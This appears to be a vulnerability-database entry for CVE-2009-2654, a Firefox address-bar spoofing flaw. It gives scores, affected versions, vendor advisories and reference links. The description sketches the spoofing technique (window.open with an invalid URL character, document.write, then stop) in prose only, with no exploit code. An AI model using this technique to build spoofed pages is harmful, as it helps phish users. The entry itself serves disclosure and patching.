CVE-2009-2654
published 2009-08-03CVE-2009-2654: Mozilla Firefox before 3.0.13, and 3.5.x before 3.5.2, allows remote attackers to spoof the address bar, and possibly conduct phishing attacks, via a crafted…
PriorityP425medium5.8CVSS 2.0
AVNACMAuNCNIPAP
EXPLOIT
EPSS
4.75%
90.7th percentile
Mozilla Firefox before 3.0.13, and 3.5.x before 3.5.2, allows remote attackers to spoof the address bar, and possibly conduct phishing attacks, via a crafted web page that calls window.open with an invalid character in the URL, makes document.write calls to the resulting object, and then calls the stop method during the loading of the error page.
Affected
140 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mozilla | firefox | <= 3.5.1 | — |
| mozilla | firefox | <= 3.0.15 | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
CVSS provenance
nvdv2.05.8MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:P
vendor_redhat5.8MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-4h5h-76c6-8744: Mozilla Firefox before 3
ghsa_unreviewed·2022-05-02
CVE-2009-2654 [MEDIUM] CWE-20 GHSA-4h5h-76c6-8744: Mozilla Firefox before 3
Mozilla Firefox before 3.0.13, and 3.5.x before 3.5.2, allows remote attackers to spoof the address bar, and possibly conduct phishing attacks, via a crafted web page that calls window.open with an invalid character in the URL, makes document.write calls to the resulting object, and then calls the stop method during the loading of the error page.
GHSA
GHSA-gfvv-6f6j-f63q: Mozilla Firefox before 3
ghsa_unreviewed·2022-05-02·CVSS 5.8
CVE-2009-3985 [MEDIUM] GHSA-gfvv-6f6j-f63q: Mozilla Firefox before 3
Mozilla Firefox before 3.0.16 and 3.5.x before 3.5.6, and SeaMonkey before 2.0.1, allows remote attackers to associate spoofed content with an invalid URL by setting document.location to this URL, and then writing arbitrary web script or HTML to the associated blank document, a related issue to CVE-2009-2654.
Red Hat
Mozilla URL spoofing via invalid document.location
vendor_redhat·2009-12-15·CVSS 5.8
CVE-2009-3985 [MEDIUM] Mozilla URL spoofing via invalid document.location
Mozilla URL spoofing via invalid document.location
Mozilla Firefox before 3.0.16 and 3.5.x before 3.5.6, and SeaMonkey before 2.0.1, allows remote attackers to associate spoofed content with an invalid URL by setting document.location to this URL, and then writing arbitrary web script or HTML to the associated blank document, a related issue to CVE-2009-2654.
Ubuntu
Firefox and Xulrunner vulnerability
vendor_ubuntu·2009-08-08
CVE-2009-2654 Firefox and Xulrunner vulnerability
Title: Firefox and Xulrunner vulnerability
Summary: Firefox and Xulrunner vulnerability
Juan Pablo Lopez Yacubian discovered that Firefox did not properly display
invalid URLs. If a user were tricked into accessing a malicious website, an
attacker could exploit this to spoof the location bar, such as in a
phishing attack. Furthermore, if the malicious website had a valid SSL
certificate, Firefox would display the spoofed page as trusted.
Instructions: After a standard system upgrade you need to restart Firefox and any
applications that use xulrunner, such as Epiphany, to effect the necessary
changes.
Red Hat
firefox: URL bar spoofing vulnerability
vendor_redhat·2009-07-24·CVSS 5.8
CVE-2009-2654 [MEDIUM] firefox: URL bar spoofing vulnerability
firefox: URL bar spoofing vulnerability
Mozilla Firefox before 3.0.13, and 3.5.x before 3.5.2, allows remote attackers to spoof the address bar, and possibly conduct phishing attacks, via a crafted web page that calls window.open with an invalid character in the URL, makes document.write calls to the resulting object, and then calls the stop method during the loading of the error page.
No detection rules found.
http://blog.mozilla.com/security/2009/07/28/url-bar-spoofing-vulnerability/http://es.geocities.com/jplopezy/firefoxspoofing.htmlhttp://osvdb.org/56717http://secunia.com/advisories/36001http://secunia.com/advisories/36126http://secunia.com/advisories/36141http://secunia.com/advisories/36435http://secunia.com/advisories/36669http://secunia.com/advisories/36670http://sunsolve.sun.com/search/document.do?assetkey=1-66-266148-1http://www.debian.org/security/2009/dsa-1873http://www.mozilla.org/security/announce/2009/mfsa2009-44.htmlhttp://www.redhat.com/support/errata/RHSA-2009-1430.htmlhttp://www.redhat.com/support/errata/RHSA-2009-1431.htmlhttp://www.redhat.com/support/errata/RHSA-2009-1432.htmlhttp://www.securityfocus.com/archive/1/505242/30/0/threadedhttp://www.securityfocus.com/archive/1/505265http://www.securityfocus.com/bid/35803http://www.securitytracker.com/id?1022603http://www.vupen.com/english/advisories/2009/2006http://www.vupen.com/english/advisories/2009/2142https://bugzilla.mozilla.org/show_bug.cgi?id=451898https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9686https://usn.ubuntu.com/811-1/https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00198.htmlhttps://www.redhat.com/archives/fedora-package-announce/2009-August/msg00261.htmlhttp://blog.mozilla.com/security/2009/07/28/url-bar-spoofing-vulnerability/http://es.geocities.com/jplopezy/firefoxspoofing.htmlhttp://osvdb.org/56717http://secunia.com/advisories/36001http://secunia.com/advisories/36126http://secunia.com/advisories/36141http://secunia.com/advisories/36435http://secunia.com/advisories/36669http://secunia.com/advisories/36670http://sunsolve.sun.com/search/document.do?assetkey=1-66-266148-1http://www.debian.org/security/2009/dsa-1873http://www.mozilla.org/security/announce/2009/mfsa2009-44.htmlhttp://www.redhat.com/support/errata/RHSA-2009-1430.htmlhttp://www.redhat.com/support/errata/RHSA-2009-1431.htmlhttp://www.redhat.com/support/errata/RHSA-2009-1432.htmlhttp://www.securityfocus.com/archive/1/505242/30/0/threadedhttp://www.securityfocus.com/archive/1/505265http://www.securityfocus.com/bid/35803http://www.securitytracker.com/id?1022603http://www.vupen.com/english/advisories/2009/2006http://www.vupen.com/english/advisories/2009/2142https://bugzilla.mozilla.org/show_bug.cgi?id=451898https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9686https://usn.ubuntu.com/811-1/https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00198.htmlhttps://www.redhat.com/archives/fedora-package-announce/2009-August/msg00261.html
2009-08-03
Published